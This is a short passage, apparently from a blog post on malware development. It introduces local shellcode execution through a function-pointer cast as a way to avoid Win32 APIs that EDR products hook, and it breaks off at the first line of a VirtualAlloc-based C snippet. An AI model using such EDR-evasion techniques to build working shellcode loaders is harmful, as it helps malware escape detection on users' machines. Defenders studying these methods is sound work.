Malware developers are always looking for new way to execute shellcode. Commonly used Win32 APIs are often hooked or otherwise monitored by an EDR. A classic method that does not require any Win32 APIs is local execution through a function pointer cast as shown below. void *exec = VirtualAlloc(0, shellcodeSize,